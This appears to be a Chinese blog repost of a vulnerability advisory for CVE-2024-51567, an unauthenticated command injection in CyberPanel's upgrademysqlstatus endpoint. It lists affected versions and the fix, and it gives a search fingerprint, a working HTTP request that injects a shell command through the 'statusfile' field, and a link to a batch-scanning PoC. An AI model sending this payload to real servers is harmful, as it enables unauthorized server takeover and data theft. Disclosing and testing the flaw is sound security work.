当前位置: 首页 > article >正文

CVE-2024-51567 CyberPanel upgrademysqlstatus 远程命令执行

该漏洞源于upgrademysqlstatus接口未做身份验证和参数过滤,未授权的攻击者可以通过此接口执行任意命令获取服务器权限,从而造成数据泄露、服务器被接管等严重的后果。

影响版本

  • CyberPanel v2.3.5
  • CyberPanel v2.3.6

目前官方已有可更新版本,建议受影响用户升级至最新版本:CyberPanel >= v2.3.7

漏洞复现

app="CyberPanel"

OPTIONS /dataBases/upgrademysqlstatus HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Content-Type: application/json
Connection: close
 
{"statusfile":"/dev/null; id; #"}

漏洞利用poc

CVE-2024-51567.py  url  命令

漏洞批量检测poc

url需要放在当前路径url.txt文件中,使用线程池并发请求。直接执行脚本即可。代码已上传:https://download.csdn.net/download/qq_44159028/89938884?spm=1001.2014.3001.5501


http://www.kler.cn/a/380357.html

相关文章:

  • RK3568开发板Openwrt文件系统构建
  • SpringBoot自动装配过程
  • CM API方式设置YARN队列资源
  • 显存占用 显存测试
  • 软设师知识点-计算机网络
  • 【Java知识】Java基础-对象排序的实现
  • JavaEE初阶-----servlet-api,Maven创建项目,部署,打包,测试全过程
  • 分类模型onnx推理,并生成混淆矩阵
  • 如何在本地Linux服务器搭建WordPress网站结合内网穿透随时随地可访问
  • 使用 Python 中的 pydub实现 M4A 转 MP3 转换器
  • element-plus按需引入报错IconsResolver is not a function
  • 经纬恒润车载TSN网络测试仪TestBase-ATT全新上线!
  • C#、C和C++的主要区别
  • Python | Leetcode Python题解之第530题二叉搜索树的最小绝对差
  • 将Notepad++添加到右键菜单【一招实现】
  • Rust 力扣 - 1297. 子串的最大出现次数
  • 使用python爬取某新闻网并进行数据分析
  • 【论文阅读笔记】Wavelet Convolutions for Large Receptive Fields
  • 论文阅读(一种基于球面投影和特征提取的岩石点云快速配准算法)
  • [ DOS 命令基础 4 ] DOS 命令命令详解-端口进程相关命令
  • 【ROS2】hbm_img_msgs/msg/HbmMsg1080P 转 opencv cv::Mat
  • 江协科技STM32学习- P32 MPU6050
  • PHP不良事件上报系统源码,医院安全不良事件管理系统,基于 vue2+element+ laravel框架开发
  • 前端页面整屏滚动fullpage.js简单使用
  • 儿童安全座椅行业全面深入分析
  • 【Linux】将 bin 目录添加到环境变量 LD_LIBRARY_PATH